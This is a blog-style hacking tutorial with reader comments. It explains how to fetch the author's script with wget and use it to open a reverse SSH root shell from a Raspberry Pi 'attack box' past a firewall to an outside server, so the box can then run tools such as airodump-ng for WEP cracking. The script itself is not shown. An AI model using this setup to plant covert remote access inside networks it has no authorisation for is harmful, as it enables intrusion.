How To: Configure a Reverse SSH Shell (Raspberry Pi Hacking Box)

Configure a Reverse SSH Shell (Raspberry Pi Hacking Box)

How to Configure a Reverse SSH Shell (Raspberry Pi Hacking Box)

If you've been watching the latest USA TV Series Mr Robot, you will have seen the Raspberry Pi used by Fsoeciety to control the HVAC system. OTW covers this very well here with his take on setup they may of used.

However I had a very different take. A netcat bind shell is great, until you want to start launching airodump-ng capture attacks a SSH shell seems like the best option however if the box is behind a firewall, you're gonna need a reverse ssh shell. For this tutorial you will need a server that is either exposed on the internet (on something like a VPS ) or port forwarded.

I have written a script to make this whole process a lot easier, and you can grab it in this awesome blue fuzzy highlighting link of magic. And I will show you how to do use it. You can find out manually here.

Step 1: Upload the Script to Your Devices!

Download the script to each of your devices, you can easily download this with

wget https://gist.githubusercontent.com/pry0cc/dd0fd2d7bd1a72787975/raw/ec19286bc55954ccaeba203f6dc2d0e2632453ea/reverse-ssh.sh

Step 2: Set Up a Handler on Your Server

Choose a device to be your server, this will typically be a VPS or something of that sort that is internet facing. Or... It can be something on your local network, in this example I will using my remote VPS as the server, and my laptop as the attack client (the device i will be controlling). Though this setup, I will be able to control my laptop, from my server without ever portforwarding.

Image via imgur.com

On my server I will set up the handler with
./reverse_ssh.ssh -s <my servers external ip> <the port I want to use>
so in my case it is.
./reverse_ssh.ssh -s 100.100.100.100 30 (that IP is only a placeholder :P this would actually be your servers IP).

This will hang there waiting for a connection. This is when we move onto our client or attack box (this could be the Raspberry Pi)

Step 3: Set Up a Connect Listener on Your Client/Pi

The syntax works like this.
./reverse_ssh.sh -c <ip of handler> <port of handler> <reconnect time in seconds>

The script will attempt to connect to the server until it establishes a connection with it. Once established, it will stop printing "Attempting connection" and will hang. This is when we should hop on over to our attack client.

Image via imgur.com

Step 4: Pwn the World!

Image via imgur.com

If we did everything correctly, our server should present us with a password login prompt, it says "localhost", which actually infact means our remote client. Once we enter the password, we will have our reverse ssh root shell! From here we can do anything the client can do, including firing up airodump-ng and doing some WEP cracking :)

PRY0CC

5 Comments

Great work pry0cc.
I was looking for some SSH script like this.
+1

Thanks :) I was in need too, so I made somethng!

thanks for this man very nice

I love that terminal prompt, Parrot Security has that for its terminal prompt. I have issues at times with Parrot so i use kali more. I was just wondering if you did this tutorial with Parrot? If another distro how did you get the prompt to look that way? Is it in bash.rc terminal profiles or something like that because ive really want ALL my terminals, on any distro flav to look like that. I havent been able to figure out what I need to copy/edit to make the terminal prompt look like Parrot securitys terminal. Any chance you could advise on this?

Thanks

Share Your Thoughts

  • Hot
  • Latest